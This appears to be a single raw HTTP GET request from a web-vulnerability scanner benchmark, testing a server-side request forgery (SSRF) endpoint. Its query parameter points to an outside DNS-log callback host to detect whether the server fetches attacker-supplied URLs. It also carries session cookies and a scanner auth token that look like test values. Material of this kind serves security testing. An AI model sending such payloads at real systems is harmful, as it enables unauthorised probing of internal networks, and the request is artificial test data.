GET /ssrf/BS00141?BS00141=http://aaa.www.dnslog.com/123/ HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/json;utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zone=GZ00B; sdvt=llP0OkDDP8FzDXBFp45J8SEsbQeEHuOV;  rtk=JWcET0tg1NDnwTHqAqSrx2sVxXILKk+H/gxiUvHXv9rLKAGKAqt; isEnableLocale=disabled; LOCALE=zh_CN; ALIPAYBUMNGJSESSIONID=GZ00TJ9j9FGs9wqXJcd7jZLwM0O4KnantbuserviceGZ00; ALIPAYJSESSIONID=GZ00970608752FAE42FA83FFB9A98B94ABF6antbenchmarkGZ00; ctoken=H1YihhEt5l4ZQvfh; BS00024=123
scannerauth: cd117e0a9365670f19c768032f8dabfe
Connection: close
Content-Length: 0

